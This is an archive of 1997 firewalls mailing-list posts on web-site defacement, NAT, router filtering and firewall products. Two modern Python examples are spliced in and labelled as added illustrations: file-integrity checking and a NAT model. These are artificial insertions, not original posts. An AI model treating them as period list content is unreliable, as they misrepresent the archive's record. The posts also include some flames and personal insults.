Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA05214 for firewalls-outgoing; Tue, 7 Jan 1997 11:56:26 -0800 (PST)
Received: from DOCKMASTER.NCSC.MIL (DOCKMASTER.NCSC.MIL [198.26.55.74]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id LAA05204 for ; Tue, 7 Jan 1997 11:56:08 -0800 (PST)
Date: Tue, 7 Jan 97 14:53 EST
From: Wilner@DOCKMASTER.NCSC.MIL
Subject: Re: Re: NCSA != NCSC
To: firewalls@GREATCIRCLE.COM
Message-ID: <970107195334.971794@DOCKMASTER.NCSC.MIL>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> I have to say up front that I agree with MJR.
>
> . . . if the firewall software is implemented below the O/S layer
> . . . then the O/S will never even "see" . . .

Everything except boot-up depends upon the O/S. Nothing is below the "O/S layer," nor does one speak of such a layer unless one intends "application layer" and doesn't know an application from an O/S, nor can a single byte be sent or retrieved over a device (networked or otherwise) unless an O/S is relied upon, nor can a single access to memory, disk, or what-have-you be performed by networking code "below the O/S layer," as we so quaintly say, if there is no O/S involved.

Gentlemen, if this represents your understanding of operating systems and security, please contribute to alt.brush-sellers, not to firewalls.
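Two proposals in these threads come down to the same user-space mechanism: Charles Kaplan's "fingerprint every file, and croak if anything unfingerprinted turns up" (quoted in the NCSA != NCSC thread above) and Eric Dickinson's "on any tampering trigger, overwrite the presented pages from a protected master copy". The following is an added illustration written for this digest, not code from any list participant or product; it assumes the manifest and master copy are produced in Kaplan's no-network maintenance mode and kept on media the production system cannot write (the read-only-disk and immutable-flag ideas raised in the airfhack thread), and all file names and contents are constructed.

```python
"""Integrity manifest + restore-from-master, modelling Kaplan's and Dickinson's ideas.

Added example, not from the original thread. Assumes the manifest and the master
tree live on media the production host cannot write (read-only disk / immutable).
"""
import hashlib
import shutil
import tempfile
from pathlib import Path


def fingerprint(path: Path) -> str:
    """SHA-256 of one file, streamed so large pages or binaries never load whole."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root: Path) -> dict[str, str]:
    """Relative path -> fingerprint for every regular file under root (maintenance mode)."""
    return {
        p.relative_to(root).as_posix(): fingerprint(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def verify(root: Path, manifest: dict[str, str]) -> dict[str, list[str]]:
    """Compare the live tree against the manifest and classify each deviation."""
    current = build_manifest(root)
    return {
        "added": sorted(set(current) - set(manifest)),      # files nobody vouched for
        "removed": sorted(set(manifest) - set(current)),    # content that went missing
        "modified": sorted(p for p in current.keys() & manifest.keys()
                           if current[p] != manifest[p]),   # defaced or replaced files
    }


def must_halt(report: dict[str, list[str]]) -> bool:
    """Kaplan's rule: anything present that the manifest does not vouch for -> croak."""
    return bool(report["added"] or report["modified"])


def restore(presented: Path, master: Path, report: dict[str, list[str]]) -> list[str]:
    """Dickinson's rule: make the presented tree exactly what the master says it is."""
    touched = []
    for rel in report["added"]:
        (presented / rel).unlink()               # nothing unvouched-for may stay
        touched.append(rel)
    for rel in report["removed"] + report["modified"]:
        dst = presented / rel
        dst.parent.mkdir(parents=True, exist_ok=True)
        shutil.copyfile(master / rel, dst)       # master copy is the source of truth
        touched.append(rel)
    return sorted(touched)


def demo() -> dict:
    """Constructed scenario: tiny site, simulated defacement, detection, restore."""
    with tempfile.TemporaryDirectory() as tmp:
        master, presented = Path(tmp, "master"), Path(tmp, "htdocs")
        for tree in (master, presented):                     # constructed sample site
            (tree / "img").mkdir(parents=True)
            (tree / "index.html").write_text("<h1>Welcome</h1>\n")
            (tree / "img" / "logo.txt").write_text("logo bytes\n")
        manifest = build_manifest(master)                    # built in maintenance mode
        clean = verify(presented, manifest)

        # Simulated tampering of the presented copy (constructed, not a real incident)
        (presented / "index.html").write_text("<h1>defaced</h1>\n")   # modified page
        (presented / "cgi-bin").mkdir()
        (presented / "cgi-bin" / "tool").write_text("placeholder\n")  # unvouched file
        (presented / "img" / "logo.txt").unlink()                     # removed file

        report = verify(presented, manifest)
        halt = must_halt(report)
        restored = restore(presented, master, report)
        after = verify(presented, manifest)
        return {"clean": clean, "report": report, "halt": halt,
                "restored": restored, "after": after}


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The model stops at the file level, which is exactly the gap Dale Drew and Norm point out: a manifest on writable media is only as good as root's inability to rewrite it, and nothing here defends against the DNS substitution the airfhack summary mentions.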
From firewalls-owner Tue Jan 7 12:27:52 1997
From: "Starkweather, Mike"
To: "'firewalls@GreatCircle.COM'"
Subject: Pointcast
Date: Tue, 7 Jan 1997 13:29:08 -0600

I am wondering how the members of this mail list have handled the flood of traffic generated by Pointcast. It has buried our firewall (TIS Toolkit) with the huge number of requests it generates. Their I-Server seems to help some but not as much as I had hoped. If this is the wrong place for this question please redirect me.

Mike Starkweather
Anheuser-Busch

From firewalls-owner Tue Jan 7 13:04:55 1997
From: "McMahan, Peg"
To: "'Firewalls Mailing List'", "'Carl Karlsson'"
Subject: RE: NT NAT
Date: Tue, 7 Jan 1997 14:56:07 -0500

>----------
>From: Carl Karlsson[SMTP:ckn@findata.se]
>Sent: Friday, January 03, 1997 11:43 AM
>To: 'Firewalls Mailing List'
>Subject: RE: NT NAT
>
>On Fri, 3 Jan 1997, Russ wrote:
>
>> You got anything intelligent to say on just why you think NAT offers ANY
>> SECURITY AT ALL??? I can't wait to hear it. I mean ANY SECURITY AT ALL.
>
>I'd like to know if and why this means that masquerading one's network
>behind a 'secured' host doesn't provide any added security from just
>connecting the network straight out? Or am I missing something here (not
>unusual :)?
>I was under the impression that if I use some box (Linux with TIS fwtk for
>example, or that NT box perhaps?) masquerading my network and using
>192.168.x.x-addresses inside, I would be at least a little bit more secure
>than if I had all my w95/nt/unix machines directly connected to the
>internet?

A hacker will know if those machines are there or not... Most people who don't know too much about the net wouldn't think anything of there possibly being more machines behind the firewall... however, hackers will. I suppose you could toss this under the 'security through obscurity' theme, but.... time has taught us that doesn't work. Hackers are very curious beings and will find just about anything, no matter how well you think you've hidden it. Machines that are masqueraded? That's nothing. The people that wouldn't even think about anything being hidden that way wouldn't be able to hack the machines anyway. That's my opinion anyhow, and I'll stick to it.

>(Not talking super-secure here, not flaming anyone, but just interested!
>Pointers do nicely if this is already well-known...)

No, not talking super secure.... but that's the type of security that the only people that would be fooled wouldn't know how to hack those hidden machines anyway.
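The NAT thread above asks whether putting hosts on 192.168.x.x addresses behind a masquerading box adds any security. The Python below is an added example, not code from the list or from any product named in the thread; it models a minimal stateful masquerading box to show where the real protection comes from: not from the inside addresses being hidden, but from the box translating only packets that belong to a connection an inside host opened, and from the border refusing packets that arrive from outside claiming an inside or RFC 1918 source address. The `Masquerader` class, the public address 203.0.113.5, the inside network 192.168.1.0/24 and every packet are constructed for the demonstration.

```python
"""Stateful masquerading (NAT) with a border anti-spoofing check.

Added example, not code from the firewalls list or from any product
named in the thread. All addresses and packets are constructed.
"""
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# RFC 1918 ranges: must never appear as a source on the outside interface.
PRIVATE_NETS = [ipaddress.ip_network(n)
                for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int


class Masquerader:
    """Minimal port-based masquerading box with an inside and an outside interface."""

    def __init__(self, public_ip: str, inside_net: str, first_port: int = 40000):
        self.public_ip = public_ip
        self.inside_net = ipaddress.ip_network(inside_net)
        self.next_port = first_port
        # (inside_ip, inside_port, dst, dport) -> translated public port
        self.table: Dict[Tuple[str, int, str, int], int] = {}
        # (public_port, outside_ip, outside_port) -> (inside_ip, inside_port)
        self.reverse: Dict[Tuple[int, str, int], Tuple[str, int]] = {}
        self.log: List[str] = []

    def outbound(self, pkt: Packet) -> Optional[Packet]:
        """Packet seen on the inside interface heading out; create or reuse a mapping."""
        if ipaddress.ip_address(pkt.src) not in self.inside_net:
            self.log.append(f"DROP outbound: source {pkt.src} is not an inside host")
            return None
        key = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        if key not in self.table:
            self.table[key] = self.next_port
            self.reverse[(self.next_port, pkt.dst, pkt.dport)] = (pkt.src, pkt.sport)
            self.next_port += 1
        return Packet(self.public_ip, self.table[key], pkt.dst, pkt.dport)

    def inbound(self, pkt: Packet) -> Optional[Packet]:
        """Packet seen on the outside interface; only replies to existing mappings pass."""
        src = ipaddress.ip_address(pkt.src)
        # Anti-spoofing: nothing arriving from outside may claim an inside or private address.
        if src in self.inside_net or any(src in net for net in PRIVATE_NETS):
            self.log.append(f"DROP inbound: spoofed source {pkt.src}")
            return None
        if pkt.dst != self.public_ip:
            # Inside addresses are not routable from outside; the only reachable one is ours.
            self.log.append(f"DROP inbound: destination {pkt.dst} is not the public address")
            return None
        mapping = self.reverse.get((pkt.dport, pkt.src, pkt.sport))
        if mapping is None:
            # No inside host opened this connection, so there is nobody to deliver it to.
            self.log.append(f"DROP inbound: unsolicited {pkt.src}:{pkt.sport} -> port {pkt.dport}")
            return None
        inside_ip, inside_port = mapping
        return Packet(pkt.src, pkt.sport, inside_ip, inside_port)


def demo():
    """Constructed scenario: one inside host browsing out, two probes from outside."""
    nat = Masquerader("203.0.113.5", "192.168.1.0/24")
    out = nat.outbound(Packet("192.168.1.10", 1025, "198.51.100.20", 80))
    reply = nat.inbound(Packet("198.51.100.20", 80, "203.0.113.5", out.sport))
    # A packet from outside forging an inside source address is dropped at the border.
    spoofed = nat.inbound(Packet("192.168.1.10", 2000, "203.0.113.5", 23))
    # A fresh connection attempt to the public address finds no mapping and is dropped.
    unsolicited = nat.inbound(Packet("198.51.100.99", 4444, "203.0.113.5", 23))
    return out, reply, spoofed, unsolicited, nat.log


if __name__ == "__main__":
    for item in demo():
        print(item)
```

The two dropped probes are the whole argument: the inside host is reachable only through a mapping it created itself, which is the "outgoing only" behaviour a stateful NAT gives, and the anti-spoofing check is what keeps an outsider from borrowing an inside address to get past that. Neither depends on anyone failing to guess that 192.168.1.0/24 exists.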
From firewalls-owner Tue Jan 7 13:10:15 1997
From: long-morrow@CS.YALE.EDU
Date: Tue, 7 Jan 1997 15:13:54 -0500 (EST)
Message-Id: <199701072013.PAA27798@SPARKY.CF.CS.YALE.EDU>
To: firewalls@greatcircle.com, oconnor@reston.ans.net
Subject: Re: Web Site Hacking
Cc: Steve@hon.com, eric@nova.dcrt.nih.gov

>Today's Washington Post had a brief article regarding the ForceField product
>from TIS which is apparently intended to address this issue. Unfortunately
>you have to register to find out anything specific about the package, e.g.
>which OS it replaces/augments. They do tell you the price however :-). I've
>registered but the implication is that the more specific information will
>be sent surface mail.

According to the TIS Web page on Gauntlet ForceField ( http://www.tis.com/docs/products/gauntlet/forcefield/index.html ) if you register they will give you a free evaluation copy of the software available in January.

- Morrow

From firewalls-owner Tue Jan 7 13:18:26 1997
In-Reply-To: <199612312101.NAA17474@miles.greatcircle.com>
Date: Mon, 06 Jan 1997 16:53:57 +0100 (MET)
Organization: ENTE NAZIONALE DI DERATTIZZAZIONE
From: Andrea Ferraris
To: uskanbye@ibmmail.com
Subject: Re: Air Force Web Site Hacked
Cc: firewalls@greatcircle.com

>I have not set one up yet(Planned for July), but I believe you can have
>a totally CDROM machine, at least using Novell or NT. Bootable CDROMs
>and all data on CDROM so you would not have any writable media.

You could use - maybe - Linux from Caldera too. Some months ago, they worked on booting systems from CDROM with Adaptec 2940 controllers. But I can't figure out what can be the use of a diskless server. I think also that you must get more RAM because of the lack of disk space for swapping. In any case you shouldn't give my thoughts much consideration because I'm not an expert.
Regards,
Andrea
----------------------------------
E-Mail: Andrea Ferraris
Date: 06-Jan-97
Time: 16:53:57
This message was sent by XFMail
----------------------------------

From firewalls-owner Tue Jan 7 13:22:14 1997
Message-Id: <32D2B242.167EB0E7@iphase.com>
Date: Tue, 07 Jan 1997 14:29:54 -0600
From: Patrick Larkin Jr
Organization: Interphase Corporation
To: firewalls@greatcircle.com
Subject: [Fwd: Re: Web Site Hacking]

Steve wrote:
>
> Eric K. Dickinson wrote:
> >
> > I am wondering if this is a suitable solution. Could one not set up a passive
> > defence by overwriting the presented home-pages at a predetermined time and
> > at some other trigger such as a write or copy. Any unauthorized action could
> > also be used as a trigger to just "overwrite". The real home-page could be
> > anywhere accessible only by the OS itself or another hardened location not
> > presented to the world. I am used to the Unix world and have more experience
> > there than NT.
> >
> > Any Ideas? Thoughts? Or is this out in left field?
> >
> > eric@nova.dcrt.nih.gov
>
> Eric,
>
> A very interesting thought..but firewalls are supposed to prevent users
> from being able to tamper in the first place. But, I for one am going
> to give that more serious consideration as I see its possibilities for
> use on maybe another machine on the LAN to check on the status of say a
> web server. Thanks for the idea..
>
> Steve
> Steve@hon.com
> sdg consulting

2 things:

1. I disagree with the statement about firewalls.... some find it more palatable to put the web server OUTSIDE the firewall and not let ANYONE through

2. the idea of re-writing the files regularly on the web server is a good one.... we do something similar to 'rdist's binary compare and unconditionally re-write that which differs from the "master" copy stored well within our security perimeter.

We also ascribe to 1 above and do NOT trust our web server in any way.... if it's crashed, we know it quickly, restore from a recent backup, and go on with our lives.

--
[~]========================================================================[~]
| Patrick Larkin Jr.                                  Systems Administrator |
| Ah, but Unix IS a User Friendly OS! It's just picky about its friends!    |
[_]========================================================================[_]

From firewalls-owner Tue Jan 7 13:27:47 1997
Message-ID: <32D2913C.91E@hon.com>
Date: Tue, 07 Jan 1997 13:12:49 -0500
From: Steve
Reply-To: Steve@hon.com
Organization: sdg consulting
To: firewalls@GreatCircle.COM
Subject: To Firewall or Not to Firewall?

Hi,

I have been viewing this list for several weeks now and it seems that the general consensus is that a firewall is needed in ALL cases. What I am wondering is what if the only connection to the Internet is a Website? And what if the WebSite software has its own built-in security such as O'Reilly's WebSite does? Is a firewall _still_ necessary? Thanks for any responses..I would hope that others would be wondering this also, not just myself, and any responses would benefit many.
Steve
Steve@hon.com
sdg consulting

From firewalls-owner Tue Jan 7 14:35:19 1997
From: "Stout, Bill"
To: "'Firewall List'"
Subject: Multi-FW Gateway management GUI
Date: Tue, 7 Jan 1997 13:56:12 -0800

I'm collecting basic requirements for FW-farm management applications for an internal instructional document.

What I've thought of so far is the following:

1. An initial GUI which allows an administrator to view multiple gateways, ports, alert status, and proxy states.
2. The ability to select a proxy and view configuration information on that proxy on a specific gateway.
3. The ability to delegate departmental security.
4. The ability to manage individual user authentication per proxy.
5. The ability to centrally view logs.
6. The ability to send pages on specific events.
7. If located on the same DMZ subnet as the gateways, the ability to sniff packets and graphically organize them, other basic network management monitoring.
8. A sanity-check utility which looks for obvious proxy filter configuration errors.
9. A tripwire utility to display alerts on file and process state changes.
10. 'Courtney' for farms?
11. Instant traceback utility to collect suspicious host information (DNS data, traceroute, whois, traffic type, etc).
12. Time synchronization verification for accurate log comparisons.
13. Strongly encrypted and authenticated administrative channels.
14. Load balancing?

Comments? Which are overkill and which should I add?

Bill Stout

From firewalls-owner Tue Jan 7 16:32:27 1997
Message-Id: <199701080136.UAA14304@unix1.sysnet.net>
Subject: USAF: how it was hacked
Date: Tue, 7 Jan 97 19:09:39 -0400
From: Matthew Patton

No, this isn't about cdrom based web content. Really quite anticlimactic. The infamous phf script was left active on the server and was how they got in. Root, the whole 9 yards.

What's really funny is that no more than a week prior to the incident, I suggested to ASSIST (the military's equiv of CERT, and now financial sponsor of same) that in light of the minor poking around I did on a handful of military web sites, that they needed to get the word out to admins because so many servers were in a high state of misconfiguration and just waiting to be exploited. 7 days later, boom!!

I'm not sure on what grounds people place so much trust in the military to do things right with respect to host and network security. I'm sure there are segments that do a damn fine job, but seeing the abject lack of skills and knowledge in the Pentagon area makes me a mite bit skeptical and not a little ashamed. It's a wonder we don't see high profile exploits on a routine basis. Don't get me wrong, the private sector doesn't have their act together on many fronts as well.

Now hopefully the thread can die in peace.

From firewalls-owner Tue Jan 7 17:29:31 1997
Message-Id: <199701080109.RAA28245@mailtod-1.alma.webtv.net>
From: bigal1@webtv.net (Alfred Lipschitz)
Date: Tue, 7 Jan 1997 20:09:33 -0500
To: firewalls@GreatCircle.COM
Subject: New Party

They contacted , when I respond I get garbage back. Tell them to call me 609-264-0311. Thanks, I appreciate it.
El Producto

From firewalls-owner Tue Jan 7 17:53:30 1997
Message-ID: <32D2F4C6.5DA5@ncs.com.sg>
Date: Wed, 08 Jan 1997 09:13:42 +0800
From: Henry Lim Chee Wee
Organization: National Computer Systems Pte Ltd
To: Steve@hon.com
CC: firewalls@GreatCircle.COM
Subject: Re: To Firewall or Not to Firewall?
References: <199701080101.JAA26202@elm.ncs.com.sg>

> Steve once wrote:
> >
> > Hi,
> >
> > I have been viewing this list for several weeks now and it seems that
> > the general consensus is that a firewall is needed in ALL cases. What I
> > am wondering is what if the only connection to the Internet is a
> > Website? And what if the WebSite software has its own built-in security
> > such as O'Reilly's WebSite does? Is a firewall _still_ necessary?
> > Thanks for any responses..I would hope that others would be wondering
> > this also, not just myself, and any responses would benefit many.
> >
> > Steve
> > Steve@hon.com
> > sdg consulting

IMHO, a firewall is necessary as long as you are not running a standalone web server with sole access to the Internet. O'Reilly's WebSite is an application program running over a largely insecure OS platform that will still allow the purposeful prankster to ruin your show for a laugh. The word 'secure', as I looked at it, is history. Anything considered secured now is relative to the lack or gain of technology and information. And then there are the bugs......

A firewall may not be some screening that you will like, especially when the industry is oddly shifting to the WindowsNT platform. But it will still reduce the odds of a would-be hacker making curtain calls to your website/LAN and provides a misinformed peace of mind to your company's MIS.

But if you don't like firewalls, try reducing the number of active ports to the minimal necessity, and delete a whole lot of interesting executables. Security in a networking environment, after all, means inconveniences.

--
nitro
"I-dare-you geysering forth with heartacious good will"
Flames > /dev/null

From firewalls-owner Tue Jan 7 18:35:26 1997
From: Ricardo Alvarado
To: "firewalls@GreatCircle.COM"
Subject: Re: internal filtering router - filter config?
Date: Fri, 3 Jan 1997 09:20:46 -0600

>What type of things would you filter on the internal router? or even
>the external router? I am going to be installing a firewall real soon
>and would really appreciate any help.
>
>-steve.
>matkoski@dreamscape.com

In your external router you'd block any ICMP traffic going back and forth, as well as any packets bearing one of your internal IP addresses as a source address, especially if these are going INTO your protected network.

Also, kill telnets, fingers, snmp and snmp trap. Actually, kill any ports that your users will not be using, and leave just mail, web, ftp, etc.

ricardo
ralvarado@avantel.com.mx

From firewalls-owner Tue Jan 7 18:40:41 1997
Date: Tue, 7 Jan 1997 21:21:49 -0500 (EST)
From: "Paul D. Robertson"
To: Wilner@DOCKMASTER.NCSC.MIL
cc: firewalls@GreatCircle.COM
Subject: Re: Re: NCSA != NCSC
In-Reply-To: <970107195334.971794@DOCKMASTER.NCSC.MIL>

On Tue, 7 Jan 1997 Wilner@DOCKMASTER.NCSC.MIL wrote:

> Everything except boot-up depends upon the O/S. Nothing is below the "O/S
> layer," nor does one speak of such a layer unless one intends "application

Hrm, I'd always considered monitor PROMs to be 'below' the OS since it's unaware of the PROM code running, has no control of the machine at that point, is still loaded in memory, and can be manipulated without its own consent. Hardware debuggers have also always fallen in this category, in my view. Depending on the OS, there can be software, hardware, or firmware memory management operating "under" the OS, especially if that OS is running in a virtual machine, or some other bounded "sandbox", "the OS" doesn't always mean "the *only* OS".

> layer" and doesn't know an application from an O/S, nor can a single byte be
> sent or retrieved over a device (networked or otherwise) unless an O/S is
> relied upon, nor can a single access to memory, disk, or what-have-you be

Hmm, that's funny, the PROMs in my Suns seem quite happy to access the console device without Solaris'/SunOS' knowledge. MVS also seemed quite happy running under VM last time I did it, and the controlling OS in the 'OS' stack seemed quite happy to go right up against the real and virtual devices without MVS' say so. Certainly from an MVS applications standpoint things were running 'below' the OS.

> performed by networking code "below the O/S layer," as we so quaintly say,
> if there is no O/S involved.

And many OS' rely on firmware code layered beneath them to access the actual devices. No reason you couldn't do the same for CPU, masking the OS and its applications to some subset of the machine, and enforcing memory, instruction, or device protection.

> Gentlemen, if this represents your understanding of operating systems and
> security, please contribute to alt.brush-sellers, not to firewalls.

Care for a broom to ride out on?

Paul
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
PSB#9280

From firewalls-owner Tue Jan 7 19:44:09 1997
Date: Wed, 8 Jan 1997 11:34:24 +0800
From: David.Wee@Singapore.Sun.COM (David Wee)
Message-Id: <199701080334.LAA07851@pacifica.Singapore.Sun.COM>
To: drexx@sunphil.mozcom.com
Subject: Re: FW-1 throughput? Etc.
Cc: firewalls@greatcircle.com

----- Begin Included Message -----

From julie.gupta@Eng Tue Jan 7 02:50:29 1997
Date: Mon, 6 Jan 1997 10:56:25 -0800
From: julie.gupta@Eng (Julie Gupta)
To: David.Wee@Singapore
Subject: Re: FW-1 throughput? Etc.
Cc: elizabeth.purcell@Eng

David,

As for the second question, FW-1 2.1 does have a VPN add-on module. Please check the pricelist. SunScreen EFS is also a software solution that provides VPN capability. There is a positioning document on the web on when to use one over the other. They are competitive products.

Hope this helps,
Julie

> From David.Wee@Singapore Sun Jan 5 23:55:38 1997
> Date: Mon, 6 Jan 1997 15:53:50 +0800
> From: David.Wee@Singapore (David Wee)
> To: julie.gupta@Corp
> Subject: FW-1 throughput? Etc.
> Cc: David.Wee@Singapore
>
> Julie,
>
>
> Can you please help answer 1 & 2
>
>
> Regards,david
> ----- Begin Included Message -----
>
> From drexx@sunphil.mozcom.com Mon Jan 6 15:45:31 1997
> Date: Mon, 6 Jan 1997 15:46:44 -0800
> From: drexx@sunphil.mozcom.com (Dexter D. Laggui)
> To: firewalls@greatcircle.com, dwee@Singapore
> Subject: FW-1 throughput? Etc.
>
> Hello world,
>
> I would be very much obliged if anybody can please answer on this:
>
> 1] How many packets per second can the Solstice Firewall-1 2.1
>    (installed in a Sun Sparcstation 20 with Solaris 2.5)
>    process ? In mbps terms?
> 2] Current needs dictate for a solution involving FWs with multiple
>    secure VPNs to mobile customers. I like the capabilities of
>    FW-1 2.1 very much but I understand that it does not support VPN
>    today. Do I need the SunScreen to complement it? :-(
> 3] Who do I talk to in Sun Singapore for FW and SunScreen training?
>    What is the mailing list for Checkpoint/Solstice Firewall-1 users?
>
> Thank you very much for your kindness. :-)
>
> Yours,
> Dexter D. Laggui
> Systems Engineer
>
> drexx@sunphil.mozcom.com
> Philippine Systems Products Inc.
>
>
> ----- End Included Message -----
>

----- End Included Message -----

From firewalls-owner Tue Jan 7 19:48:45 1997
From: lists@lina.inka.de (Bernd Eckenfels)
Subject: Re: To Firewall or Not to Firewall?
To: Steve@hon.com
Date: Wed, 8 Jan 1997 04:04:36 +0100 (MET)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <32D2913C.91E@hon.com> from "Steve" at Jan 7, 97 01:12:49 pm

Hello,

> I have been viewing this list for several weeks now and it seems that
> the general consensus is that a firewall is needed in ALL cases.

Not really.

> What I
> am wondering is what if the only connection to the Internet is a
> Website?

It's safe enough to place a packet filter in front of the server (in your ISP access router). But it is then important that there is no net connection to internal hosts. This means all html files need to be uploaded by disk, locally edited or via the net (if you are so daring to allow that method). You will very fast need to connect your office LAN to the web server, or to the internet for WWW Surfing.
Then you might consider using a firewall or a stateful NAT box with outgoing-only connections.

Greetings
Bernd

From firewalls-owner Tue Jan 7 19:59:33 1997
Date: Wed, 8 Jan 1997 11:32:59 +0800
From: David.Wee@Singapore.Sun.COM (David Wee)
To: drexx@sunphil.mozcom.com
Subject: Re: FW-1 throughput? Etc.
Cc: firewalls@greatcircle.com

----- Begin Included Message -----

Date: Mon, 6 Jan 1997 12:10:23 -0800
From: elizabeth.purcell@Eng (Elizabeth Purcell)
Subject: Re: FW-1 throughput? Etc.
Cc: julie.gupta@Eng, elizabeth.purcell@Eng
To: David.Wee@Singapore

David,

I have firewall throughput information at the URL http://netrai4.eng/firewall/firewall.results.new.html. The results were measured on an Ultra 2/2170 with SunSwift network adaptors (100BaseT) at half duplex. Notice that the CPU utilization for the workstations with the firewalls installed did not come close to saturation. Looking at the SPEC95 info at the URL http://perfwww.eng/tasks/results/spec95, an SS20/71 is about half the CPU performance of an Ultra 2/2170.

Hope that this helps. Let me know..

Elizabeth

> From gupta@gupta Mon Jan 6 10:49:57 1997
> Date: Mon, 6 Jan 1997 10:56:25 -0800
> From: gupta@gupta (Julie Gupta)
> To: David.Wee@Singapore
> Subject: Re: FW-1 throughput? Etc.
> Cc: elizabeth.purcell@Eng
>
> Elizabeth,
>
> Can you help David with his first question?
>
> Thanks.
>
> -------------------------------------------
> David,
>
> As for the second question, FW-1 2.1 does have a VPN add-on module.
> Please check the pricelist. SunScreen EFS is also a software solution
> that provides VPN capability. There is a positioning document on the
> web on when to use one over the other. They are competitive products.
>
> Hope this helps,
> Julie
>
> > From David.Wee@Singapore Sun Jan 5 23:55:38 1997
> > Date: Mon, 6 Jan 1997 15:53:50 +0800
> > From: David.Wee@Singapore (David Wee)
> > To: julie.gupta@Corp
> > Subject: FW-1 throughput? Etc.
> > Cc: David.Wee@Singapore
> >
> > Julie,
> >
> > Can you please help answer 1 & 2
> >
> > Regards, david
> > ----- Begin Included Message -----
> >
> > From drexx@sunphil.mozcom.com Mon Jan 6 15:45:31 1997
> > Date: Mon, 6 Jan 1997 15:46:44 -0800
> > From: drexx@sunphil.mozcom.com (Dexter D. Laggui)
> > To: firewalls@greatcircle.com, dwee@Singapore
> > Subject: FW-1 throughput? Etc.
> >
> > Hello world,
> >
> > I would be very much obliged if anybody can please answer this:
> >
> > 1] How many packets per second can the Solstice Firewall-1 2.1
> >    (installed in a Sun Sparcstation 20 with Solaris 2.5)
> >    process? In mbps terms?
> > 2] Current needs dictate a solution involving FWs with multiple
> >    secure VPNs to mobile customers. I like the capabilities of
> >    FW-1 2.1 very much but I understand that it does not support VPN
> >    today. Do I need the SunScreen to complement it? :-(
> > 3] Who do I talk to in Sun Singapore for FW and SunScreen training?
> >    What is the mailing list for Checkpoint/Solstice Firewall-1 users?
> >
> > Thank you very much for your kindness. :-)
> >
> > Yours,
> > Dexter D. Laggui
> > Systems Engineer
> >
> > drexx@sunphil.mozcom.com
> > Philippine Systems Products Inc.
> >
> > ----- End Included Message -----
> >
----- End Included Message -----

From firewalls-owner Tue Jan 7 20:14:12 1997
Date: Tue, 7 Jan 97 19:38:15 -0800
From: John Allen
Subject: Re: Multi-FW Gateway management GUI
To: "Stout, Bill", "'Firewall List'"

--- On Tue, 7 Jan 1997 13:56:12 -0800 "Stout, Bill" wrote:

> I'm collecting basic requirements for FW-farm management
> applications for an internal instructional document.
>
> What I've thought of so far is the following:
>
> BLAH BLAH AND BLAH were said
>
> Comments? Which are overkill and which should I add?
>
> Bill Stout
>

How about a ten million dollar budget - nice bunch of ideas, but you won't get it all to work. I use a product with 1/10 of these features, I paid a lot of money for the ones I have - and they still have bugs. Nice try. You also need a strong partnership with key vendors for distribution and support; without this your product will fail even though it has all these features. Make it shareware for $39.00, and you will probably make enough to have an Internet account for a few years.

Security software is no laughing matter, and it is usually complex; it usually comes with a disclaimer that whatever it doesn't do - isn't covered - and what it is supposed to do - it might not do.

Best of luck.

===========================================================================
John Allen                            E-mail: jallen@standard.com
Network Development Group             Telephone: (503) 321-6189
Standard Insurance, Portland Oregon   FAX: (503) 321-7290

> 1. An initial GUI which allows an administrator to view
>    multiple gateways, ports, alert status, and proxy states.
>
> 2. The ability to select a proxy and view configuration
>    information on that proxy on a specific gateway.
>
> 3. The ability to delegate departmental security.
>
> 4. The ability to manage individual user authentication
>    per proxy.
>
> 5. The ability to centrally view logs.
>
> 6. The ability to send pages on specific events.
>
> 7. If located on the same DMZ subnet as the gateways,
>    the ability to sniff packets and graphically organize
>    them, other basic network management monitoring.
>
> 8. A sanity-check utility which looks for obvious proxy
>    filter configuration errors.
>
> 9. A tripwire utility to display alerts on file and process
>    state changes.
>
> 10. 'Courtney' for farms?
>
> 11. Instant traceback utility to collect suspicious host
>     information (DNS data, traceroute, whois, traffic type,
>     etc).
>
> 12. Time synchronization verification for accurate log
>     comparisons.
>
> 13. Strongly encrypted and authenticated administrative channels.
>
> 14. Load balancing?
>
> Comments? Which are overkill and which should I add?
>
> Bill Stout
> ---------------End of Original Message-----------------

From firewalls-owner Tue Jan 7 20:29:20 1997
Date: Tue, 7 Jan 1997 22:10:40 -0500
To: firewalls@greatcircle.com
From: Mixmaster
X-Comment1: This message did not originate from the
X-Comment2: above address. It was automatically remailed
X-Comment3: by an anonymous mail service. Please report
X-Comment4: problems or inappropriate use to
X-Comment5:
Subject: IS Wilner@DOCKMASTER.NCSC.MIL A NET.LOON

--------

Some people think they are O/S gods just because of a DOCKMASTER address... since WILNER thinks this is a reason to conduct ad-hominem attacks on members of the firewalls list such as MJR (who was around LONG before Wilner), I am starting to question whether Wilner@DOCKMASTER.NCSC.MIL is really the NET.LOON Dr. Fred Cohen in disguise?

Anon

p.s. Sorry for the noise, listmaster!!

From firewalls-owner Tue Jan 7 20:45:59 1997
Date: Tue, 7 Jan 1997 22:05:59 -0500
To: Wilner@DOCKMASTER.NCSC.MIL
From: pelicans@mindspring.com (BeachCruiser)
Subject: Re: Re: NCSA != NCSC
Cc: firewalls@GreatCircle.COM

At 2:53 PM 1/7/97, Wilner@DOCKMASTER.NCSC.MIL wrote:
>> I have to say up front that I agree with MJR.
>>
>> . . . if the firewall software is implemented below the O/S layer
>> . . . then the O/S will never even "see" . . .
>
>Everything except boot-up depends upon the O/S. Nothing is below the "O/S
>layer," nor does one speak of such a layer unless one intends "application
>layer" and doesn't know an application from an O/S, nor can a single byte be
>sent or retrieved over a device (networked or otherwise) unless an O/S is
>relied upon, nor can a single access to memory, disk, or what-have-you be
>performed by networking code "below the O/S layer," as we so quaintly say,
